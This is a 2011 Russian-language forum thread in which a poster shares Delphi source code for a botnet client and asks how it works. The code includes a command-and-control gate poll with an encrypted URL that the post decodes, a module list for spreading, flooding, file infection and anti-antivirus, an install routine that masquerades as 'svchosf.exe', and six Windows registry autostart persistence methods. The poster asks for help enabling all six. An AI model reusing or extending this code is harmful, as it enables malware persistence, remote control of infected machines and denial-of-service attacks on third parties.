Вопрос ботоводам
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопрос ботоводам - 2011-06-16 11:58:41.050000
|
|
|
MYSTiQUE
Сообщений: 5
Оценки: 0
Присоединился: 2011-06-16 11:48:58.796666
|
Короче говоря ковырял я тут разные версии одного ботеГа (исходники) и обратил внимание на одну хрень, а именно
Вариант 1
procedure Timer(Wnd :HWnd; Msg, TimerID, dwTime :DWORD);stdcall;
var
Command :String;
sArray :Array[0..1024] of String;
begin
Command := ReadCommand(C_URL + 'gate.php?username='+Username+'&country='+Country+'&OS='+OS);
if not (Command = OldCommand) then
begin
OldCommand := Command;
Вариант 2
procedure Timer(Wnd :HWnd; Msg, TimerID, dwTime :DWORD);stdcall;
var
Command :String;
sArray :Array[0..2048] of String;
begin
Command := ReadCommand(pChar(Decrypt('CEDB+AaofUfM731dIe0wATbwoGXkZuxhpSVsxmpFMD3WulWSN3FmxB',key))+ Username+'&country='+Country+'&OS='+OS);
[COLOR="Red"]Зашифрованная строка {'http://nub.site11.com/gate.php?username='}[/COLOR]
if not (Command = OldCommand) then
Спрашивается зачем во втором варианте "вшивать" адрес гейта в зашифрованном виде если есть билдер…
С какой целью это было сделано… ?
У кого какие мысли?
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-17 10:27:21.010000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Возможно т.о. резервируют место под строку.
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-17 10:30:25.843333
|
|
|
Lauri
Сообщений: 1096
Оценки: 73
Присоединился: 2010-01-04 14:03:18.723333
|
Также возможно что бы с помощью реверса сразу не врубали что тут путь к админке.
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-17 13:57:13.300000
|
|
|
MYSTiQUE
Сообщений: 5
Оценки: 0
Присоединился: 2011-06-16 11:48:58.796666
|
Ладно если не врубают что это путь к админке или резервируют место под строку…
а куда тогда спрашиваеться билдер гейт будет вбивать ?
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-17 15:32:20.083333
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Туда же, вместо CEDB+AaofUfM731dIe0wATbwoGXkZuxhpSVsxmpFMD3WulWSN3FmxB
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-19 00:25:13.480000
|
|
|
MYSTiQUE
Сообщений: 5
Оценки: 0
Присоединился: 2011-06-16 11:48:58.796666
|
Смысл в таком резервировании строки?
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-19 01:07:36.900000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Какая разница как она резервируется? Вам для чего это? Резервируйте как считаете лучше и проще.
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-19 22:08:34.713333
|
|
|
MYSTiQUE
Сообщений: 5
Оценки: 0
Присоединился: 2011-06-16 11:48:58.796666
|
Простите я немного не то имею ввиду если билдер так и так впишет адрес моего гейта смысл делать какой бы то нибыло резерв?
|
|
|
|
|
RE: Вопрос ботоводам - 2011-06-20 16:54:29.596666
|
|
|
MYSTiQUE
Сообщений: 5
Оценки: 0
Присоединился: 2011-06-16 11:48:58.796666
|
Хрен с ним с гейтом теперь у меня вот какой вопрос?
есть у меня бот
program svchosf;
uses
Windows,
uConst,
uUtils,
uString,
uSystemInfo,
uWininet,
uInstall,
uDownloader,
uSpread,
uSSYN,
uUDP,
uUSBSpread,
uMSNSpread,
uLANSpread,
UnitWindows,
shellapi,
uSocks5,
uRSA,
uHTTP_Flood,
untInfector,
uAntiAV,
Winsock;
var
Thread ,Thread0 :Cardinal;
idThread :Cardinal;
dThread :Cardinal;
далее в коде самого бота
begin
AntiAV;
ReleaseIt;
Install;
где меня интересует ф-ция Install
далее идем в эту uInstall.pas
unit uInstall;
interface
uses
Windows, ShellApi, uConst, uUtils, uProcess,uStartUp ;
function Install :Boolean;
procedure HideFile(FileName :String);
const
faHidden = $00000002 platform;
faSysFile = $00000004 platform;
implementation
function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
Result := 0;
if not SetFileAttributes(PChar(FileName), Attr) then
Result := GetLastError;
end;
procedure HideFile(FileName :String);
begin
FileSetAttr(FileName, faHidden or faSysFile);
end;
{
function Install :Boolean;
var
hRegKey :HKEY;
Path :String;
begin
Result := False;
if C_START = 1 then
begin
Path := WinDir(C_VALUE);
RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', 0, KEY_SET_VALUE, hRegKey);
RegSetValueEx(hRegKey, PChar(C_KEY), 0, REG_SZ, PChar(Path), Length(Path)+1);
RegCloseKey(hRegKey);
if not FileExists(Path) then
begin
CopyFile(PChar(ParamStr(0)), PChar(Path), False);
if C_HIDE = 1 then HideFile(Path);
ShellExecute(0, 'open', PChar(Path), nil, nil, SW_HIDE);
Result := True;
end;
end;
end;
}
function Install :Boolean;
var
dir: array[0..255] of char;
name: string;
begin
getsystemdirectory(dir, 256);
name := string(dir)+'\svchosf.exe';
copyfile(pchar(paramstr(0)), pchar(name), false);//копируем файл ... если есть перезапишем!
writeprivateprofilestring('boot','shell','Explorer.exe svchosf.exe','system.ini');
AddToRun('Microsoft Host Driver ',pchar(name));
Result := True;
end;
end.
и видим там
uses
Windows, ShellApi, uConst, uUtils, uProcess,uStartUp
меня интересует эта uStartUp.pas
далее ее код
//6 Видов автозапуска
unit uStartUp;
interface
uses windows, sysutils;
procedure AddToRun(name,exe:string);
procedure AddToRunOnce(name,exe:string);
procedure AddToPolicies(name,exe:string);
procedure AddToActiveX(exe:string);
procedure AddToUserInit(exe:string);
procedure AddToShell(exe:string);
implementation
function SetTheReg(key:Hkey; subkey,name,value:string):boolean;
var
regKey:hkey;
begin
result:=FALSE;
RegCreateKey(key,PChar(subkey),regKey);
if RegSetValueEx(regKey,Pchar(name),0,REG_SZ,pchar(value),length(value)) = 0 then
result:=TRUE;
RegCloseKey(regKey);
end;
function GetTheReg(key:Hkey; subkey,nombre:String):String;
var
bytesread:dword;
regKey: HKEY;
valor:String;
begin
Result:='';
RegOpenKeyEx(key,PChar(subkey),0, KEY_READ, regKey);
RegQueryValueEx(regKey,PChar(nombre),nil,nil,nil,@bytesread);
SetLength(valor, bytesread);
if RegQueryValueEx(regKey,PChar(nombre),nil,nil,@valor[1],@bytesread)=0 then
result:=valor;
RegCloseKey(regKey);
end;
function DelTheReg(RootKey: HKEY; Name: String): boolean;
var
SubKey: String;
n: integer;
hTemp: HKEY;
begin
Result := False;
n := LastDelimiter('\', Name);
if n > 0 then
begin
SubKey := Copy(Name, 1, n - 1);
if RegOpenKeyEx(RootKey, PChar(SubKey), 0, KEY_WRITE, hTemp) = ERROR_SUCCESS then
begin
SubKey := Copy(Name, n + 1, Length(Name) - n);
Result := (RegDeleteKey(hTemp, PChar(SubKey)) = ERROR_SUCCESS);
RegCloseKey(hTemp);
end;
end;
end;
procedure AddToPolicies(name,exe: String);
begin
SetTheReg(HKEY_CURRENT_USER,'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',name,exe);
end;
procedure AddToShell(exe: String);
var
Original: string;
begin
Original:=GetTheReg(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Shell');
if ansipos(exe, original)=0 then
SetTheReg(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Shell',PChar(Original)+' "'+exe+'"');
end;
procedure AddToRunOnce(name,exe: String);
begin
SetTheReg(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',name,'"'+exe+'"');
end;
procedure AddToRun(name,exe: String);
begin
SetTheReg(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',name,''+exe+'');
end;
procedure AddToUserInit(exe: String);
var
Original: string;
begin
Original:=GetTheReg(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit');
if ansipos(exe, original)=0 then
SetTheReg(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit',PChar(Original)+' "'+exe+'"');
end;
procedure AddToActiveX(exe:string);
begin
SetTheReg(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Active Setup\Installed Components\{4fz8rk-15aq-16nc-23or4-2ke0fa051515}','StubPath','"'+exe+'"');
end;
end.
так вот в этой uInstall.pas загрузка идет как вы поняли только через
HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run
файл svchosf.exe
отсюда вопрос нахрена в этом Install вызывать uStartUp.pas с 6 путями для автозапуска
и никак это не использовать…? или я че то в этом коде не увидел?
Помогите кто может как мне реализовать в uInstall.pas эту uStartUp.pas чтобы использовать все 6 способов автозагрузки?
заранее всем спасибо за дельные ответы…
|
|
|
|
|
|
